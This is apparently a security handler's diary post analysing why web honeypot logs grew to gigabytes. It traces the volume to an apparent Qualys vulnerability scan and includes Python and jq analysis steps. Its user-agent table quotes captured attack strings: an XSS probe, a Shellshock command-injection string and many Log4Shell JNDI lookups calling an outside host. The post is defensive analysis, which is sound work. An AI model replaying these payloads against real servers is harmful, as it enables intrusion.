Overflowing Web Honeypot Logs

Published: 2023-11-20. Last Updated: 2023-11-20 00:04:09 UTC
by Jesse La Grew (Version: 1)
0 comment(s)

While reviewing one of my honeypots to convert some of the JSON data, I noticed some of my files were much larger than I expected. That leads to the question, how large should these files normally be and why are some of them so large? To help summarize this data a bit easier, it seemed like a good idea to make another python script. 

import os
from statistics import mean, median

# function to print file size summaries for data sources
def print_stats(file_size_list, file_source):
    print(f"Total {file_source} files: {len(file_size_list)}")
    print(f"Low value: {round(min(file_size_list), 2)} MB")
    print(f"High value: {round(max(file_size_list), 2)} MB")
    print(f"Median: {round(median(file_size_list), 2)} MB")
    print(f"Mean: {round(mean(file_size_list), 2)} MB\n")

# get file sizes for files in list, convert to MB and return as a list
def get_file_sizes(file_list):
    file_sizes = []
    for eachfile in file_list:
        file_sizes.append(os.stat(eachfile).st_size / (1024 * 1024))
    return file_sizes

# initialize empty lists
cowrie_files = []
webhoneypot_files = []
cowrie_file_sizes = []
webhoneypot_file_sizes = []

# get files in the current directory
# anything starting with "cowrie.json" is a cowrie log
# anything starting with "webhoneypot-" is a web honeypot log
# append file names to the appropriat list
for eachfile in os.listdir():
    if eachfile.startswith("cowrie.json"):
        cowrie_files.append(eachfile)
    elif eachfile.startswith("webhoneypot-"):
        webhoneypot_files.append(eachfile)

# get file sizes for two sets of files
cowrie_file_sizes = get_file_sizes(cowrie_files)
webhoneypot_file_sizes = get_file_sizes(webhoneypot_files)

# print out results
print_stats(cowrie_file_sizes,"Cowrie")
print_stats(webhoneypot_file_sizes,"Web Honeypot")

 

Since I keep a backup of my logs in one directory, I just needed to run this script from that location. My data was limited due to some updates over the last couple of months, but it did highlight some outliers. 

Total Cowrie files: 40
Low value: 18.13 MB
High value: 197.12 MB
Median: 29.9 MB
Mean: 34.55 MB

Total Web Honeypot files: 107
Low value: 0.05 MB
High value: 9471.03 MB <-- Much higher than what is seen most of the time
Median: 7.75 MB
Mean: 269.66 MB

The median gives a good indication of files sizes to expect from these kinds of logs, at least for this device. It's also less influenced by some of these outliers.

  • Cowrie logs: 34.55 MB
  • Web Honeypot logs: 7.75 MB

The web honeypot logs are usually small and less than a quarter the size of the cowrie logs per day. However, when looking at the maximum size ("high value"), it's been up to over 9 GB in size. That's  over 1000 times higher than the anticipated median. 


Figure 1: Highlighted web honeypot logs, GBs in size, much higher than the median

There were multiple days when these files were over 1 GB in size (listed chronologically):

  • 8/29/2023
  • 9/26/2023
  • 9/27/2023
  • 10/31/2023
  • 11/1/2023

So what happned on these days that was so unusual? Was it a particular source or something more distributed from multiple sources? Since it's a lot of data to proces, I decided to take a look day by day for any potential outliers, starting with source IP addresses first. 

cat webhoneypot-2023-08-29.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
2963943 "80.243.171.172"
  50480 "43.163.232.152"
   3846 "185.44.82.40"
   3304 "205.169.39.71"
   1719 "205.169.39.211"
   1707 "45.128.232.183"
   1702 "65.49.1.93"
   1678 "205.169.39.154"
   1532 "64.62.197.148"
   1426 "205.169.39.114"


cat webhoneypot-2023-09-26.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
12988686 "80.243.171.172"
   5713 "65.154.226.167"
   4826 "65.154.226.170"
   3598 "65.154.226.171"
   3419 "65.154.226.168"
   3003 "65.154.226.166"
   2894 "65.154.226.169"
    876 "209.159.153.74"
    871 "141.98.7.19"
    810 "205.169.39.124"


cat webhoneypot-2023-09-27.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
4971285 "80.243.171.172"
   1489 "65.154.226.166"
   1115 "65.154.226.171"
   1083 "65.154.226.170"
    984 "205.169.39.241"
    849 "65.154.226.169"
    779 "205.169.39.139"
    684 "209.159.153.74"
    604 "205.169.39.83"
    555 "43.134.109.119"


cat webhoneypot-2023-10-31.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
11595650 "80.243.171.172"
   3720 "80.94.95.226"
    922 "152.32.143.233"
    695 "83.97.73.87"
    619 "167.94.138.52"
    536 "80.82.77.202"
    488 "134.122.106.248"
    434 "84.54.51.190"
    423 "47.89.134.184"
    371 "104.199.31.214"


cat webhoneypot-2023-11-01.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
4454361 "80.243.171.172"
    932 "159.223.4.194"
    919 "80.94.95.226"
    528 "43.135.86.121"
    306 "193.35.18.33"
    292 "205.210.31.227"
    217 "35.203.210.129"
    189 "109.237.97.180"
    179 "45.128.232.125"
    155 "162.243.151.30"

 

It can be seen that there was heavy activity coming from 80.243.171.172. Looking into the PCAP data only made this more interesting.


Figure 2: Wireshark example of access from IP address that may indicate a Qualys scan [1]

 

The data indicated that this may be a Qualys vulnerability scan, which many organizations use to understand their attack surface and public vulnerabilities. Similar "Qualys" text also appeared in the ICMP traffic surrounding this example. HTTP data after this also showed similar information. 


Figure 3: Wireshark display of QualysGuard in user-agent of HTTP data

 

The web honeypot logs also had some log indicators that this may be vulnerability scan traffic. 


Figure 4: Web honeypot logs showing "qualys-scan" key within the header data. 

 

Back to one of the JSON log files to see what other user agent strings may exist. 

cat webhoneypot-2023-10-31.json | jq 'select(.sip=="80.243.171.172")' \
| jq 'select(.useragent!="")' | jq .useragent[] | sort | uniq -c | sort -rn

 738913 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0"
 419628 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"
  22000 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
  17317 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"
  15985 "curl/7.47.0"
  10470 "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0"
   7548 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)"
   6650 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
   5524 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
   5307 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
   4578 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
   4326 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0"
   4071 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
   3781 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
   3433 "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
   2627 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
   2418 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
   2255 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)"
   2199 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
   2138 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
   2031 "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
   2006 "<script>alert(Qualys)</script>"
   1986 "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id"
   1980 "curl/7.60.0"
   1965 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
   1922 "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
   1917 "Mozilla/5.0"
   1814 "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
   1794 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
   1709 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101"
   1642 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
   1613 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
   1214 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729);"
   1137 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
   1124 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0"
   1090 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
   1085 "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36"
   1028 "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"
   1006 "Node.js"
   1003 "curl/7.29.0"
    955 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
    935 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
    904 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
    885 "${jndi:corba://10.10.11.42:42053/QUALYSTEST}"
    884 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    866 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
    856 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0"
    849 "Java/1.8.0_161"
    840 "${jndi:ldap://10.10.11.42:36802/QUALYSTEST}"
    821 "Gecko/20100914"
    818 "ZX-80 SPECTRUM"
    805 "Java/1.8.0_102"
    804 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
    788 "${jndi:corba://10.10.11.42:45518/QUALYSTEST}"
    783 "${jndi:http://10.10.11.42:38541/QUALYSTEST}"
    746 "${jndi:nis://10.10.11.42:39490/QUALYSTEST}"
    716 "${jndi:http://10.10.11.42:40385/QUALYSTEST}"
    670 "${jndi:corba://10.10.11.42:35892/QUALYSTEST}"
    667 "${jndi:ldaps://10.10.11.42:40503/QUALYSTEST}"
    665 "${jndi:nds://10.10.11.42:32940/QUALYSTEST}"
    657 "${jndi:nis://10.10.11.42:38126/QUALYSTEST}"
    589 "${jndi:rmi://10.10.11.42:41209/QUALYSTEST}"
    586 "${jndi:dns://10.10.11.42:35937/QUALYSTEST}"
    573 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
    554 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
    541 "${jndi:nis://10.10.11.42:41346/QUALYSTEST}"
    540 "${jndi:nds://10.10.11.42:40149/QUALYSTEST}"
    538 "${jndi:nds://10.10.11.42:38541/QUALYSTEST}"
    529 "${jndi:ldaps://10.10.11.42:45149/QUALYSTEST}"
    521 "${jndi:iiop://10.10.11.42:42896/QUALYSTEST}"
    520 "${jndi:corba://10.10.11.42:45367/QUALYSTEST}"
    513 "${jndi:http://10.10.11.42:43708/QUALYSTEST}"
    508 "${jndi:rmi://10.10.11.42:36829/QUALYSTEST}"
    502 "${jndi:ldap://10.10.11.42:41141/QUALYSTEST}"
    481 "${jndi:nds://10.10.11.42:40385/QUALYSTEST}"
    465 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101"
    432 ": Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
    430 "${jndi:nis://10.10.11.42:38444/QUALYSTEST}"
    428 "${jndi:http://10.10.11.42:40149/QUALYSTEST}"
    410 "${jndi:rmi://10.10.11.42:45149/QUALYSTEST}"
    384 "${jndi:rmi://10.10.11.42:35898/QUALYSTEST}"
    358 "${jndi:iiop://10.10.11.42:42053/QUALYSTEST}"
    347 "${jndi:iiop://10.10.11.42:45367/QUALYSTEST}"
    323 "${jndi:ldap://10.10.11.42:46567/QUALYSTEST}"
    322 "${jndi:nds://10.10.11.42:43708/QUALYSTEST}"
    318 "${jndi:ldap://10.10.11.42:40635/QUALYSTEST}"
    312 "${jndi:iiop://10.10.11.42:45518/QUALYSTEST}"
    308 "${jndi:rmi://10.10.11.42:40503/QUALYSTEST}"
    269 "${jndi:ldap://10.10.11.42:36326/QUALYSTEST}"
    252 "${jndi:dns://10.10.11.42:39490/QUALYSTEST}"
    233 "${jndi:dns://10.10.11.42:38126/QUALYSTEST}"
    211 "${jndi:corba://10.10.11.42:42896/QUALYSTEST}"
    200 "${jndi:iiop://10.10.11.42:35892/QUALYSTEST}"
    185 "${jndi:dns://10.10.11.42:41346/QUALYSTEST}"
    180 "${jndi:ldaps://10.10.11.42:41209/QUALYSTEST}"
    146 "${jndi:ldaps://10.10.11.42:36829/QUALYSTEST}"
    105 "${jndi:http://10.10.11.42:32940/QUALYSTEST}"
     78 "${jndi:dns://10.10.11.42:38444/QUALYSTEST}"
     77 "${jndi:ldaps://10.10.11.42:35898/QUALYSTEST}"
     75 "${jndi:nis://10.10.11.42:35937/QUALYSTEST}"
      1 "QualysGuard"

 

There are many references to "Qualys" in these different user agent strings. This may be a vulnerability scan, but I was unable to find a supporting Qualys document referencing this particular IP address. In many cases, vendors will list the IP addresses being used to scan. This can be helpful to tune settings for these kinds of scans, including log verbosity and firewall rules.

This honeypot is located in my home and would have anticiapted a more localized scanner. This IP address is specified in multiple sources as coming from Vienna. In either event, these kinds of scans can fill up storage quickly. When going back to my SIEM, I noticed I couldn't pull together a chart over time for the last two months. There's a storage limit and older data was removed to adhere to these limits. Luckily, I had local files to come back to. It highlights some good reminders:

  • Determine a baseline for traffic volume or log storage, plan storage accordingly.
  • Alert on deviations from the baseline volumes.
  • Regularly tune the baseline to adjust for changes over time.
  • Any scan traffic can fill up logs quickly, legitimate or not.
  • Tools used to aggregate logs may lose data if other attacks fill up storage.
  • Consider options to retain more data, including retaining the raw logs themselves.
  • If you're using a vulnerability scanner, consider how this will impact any local or aggregated log storage, including workstations, servers, networking equipment, etc.
  • Running 'jq' queries can take a lot of time. Having faster query mechanisms, like a SIEM with all your data, can save time.

[1] https://www.qualys.com/

--
Jesse La Grew
Handler

0 comment(s)

Comments


Diary Archives